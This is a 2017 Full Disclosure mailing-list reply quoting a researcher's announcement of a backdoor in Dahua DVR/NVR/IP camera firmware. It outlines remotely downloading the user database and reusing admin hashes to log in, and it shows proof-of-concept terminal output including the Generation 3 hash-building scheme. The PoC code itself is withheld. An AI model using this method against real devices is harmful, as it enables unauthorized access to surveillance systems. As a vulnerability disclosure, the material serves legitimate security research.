Re: 0-Day: Dahua backdoor Generation 2 and 3

[Chris Holland <frenchy () gmail com>]

is this different from 2013's CVE-2013-6117 ?

https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117



On Mon, Mar 6, 2017 at 1:13 AM, bashis <mcw () noemail eu> wrote:

> [STX]
>
> I'm speechless, and almost don't know what I should write... I (hardly)
> can't believe what I have just found.
>
> I have just discovered (to what I strongly believe is backdoor) in Dahua
> DVR/NVR/IPC and possible all their clones.
>
> Since I am convinced this is a backdoor, I have my own policy to NOT
> notify the vendor before the community.
> (I simply don't want to listen on their poor excuses, their tryings to
> keep me silent for informing the community)
>
> In short:
> You can delete/add/change name on the admin users, you change password on
> the admin users - this backdoor simply don't care about that!
> It uses whatever names and passwords you configuring - by simply
> downloading the full user database and use your own credentials!
>
> This is so simple as:
> 1. Remotely download the full user database with all credentials and
> permissions
> 2. Choose whatever admin user, copy the login names and password hashes
> 3. Use them as source to remotely login to the Dahua devices
>
> This is like a damn Hollywood hack, click on one button and you are in...
>
>
> Below PoC you will find here: [Dahua asked me to remove the PoC, will be
> re-posted April 5 2017 – To give them 30 days for remediation]
> Please have understanding of the quick hack of the PoC, I'm sure it could
> be done better.
>
> Have a nice day
> /bashis
>
> $ ./dahua-backdoor.py --rhost 192.168.5.2
>
> [*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]
>
> [i] Remote target IP: 192.168.5.2
> [i] Remote target PORT: 80
> [>] Checking for backdoor version
> [<] 200 OK
> [!] Generation 2 found
> [i] Chosing Admin Login: 888888, PWD hash: 4WzwxXxM
> [>] Requesting our session ID
> [<] 200 OK
> [>] Logging in
> [<] 200 OK
> { "id" : 10000, "params" : null, "result" : true, "session" : 100385023 }
>
> [>] Logging out
> [<] 200 OK
>
> [*] All done...
> $
>
> $ ./dahua-backdoor.py --rhost 192.168.5.3
>
> [*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]
>
> [i] Remote target IP: 192.168.5.3
> [i] Remote target PORT: 80
> [>] Checking for backdoor version
> [<] 200 OK
> [!] Generation 3 Found
> [i] Choosing Admin Login: admin, Auth: 27
> [>] Requesting our session ID
> [<] 200 OK
> [i] Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074
> [i] Random value to encrypt with: 1958557123
> [i] Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074
> [i] MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E
> [>] Logging in
> [<] 200 OK
> { "id" : 10000, "params" : null, "result" : true, "session" : 1175887285 }
>
> [>] Logging out
> [<] 200 OK
>
> [*] All done...
> $
>
> [ETX]
>
>
>
>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/




-- 

Chris Holland
http://www.linkedin.com/in/chrisholland
310-500-7598

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/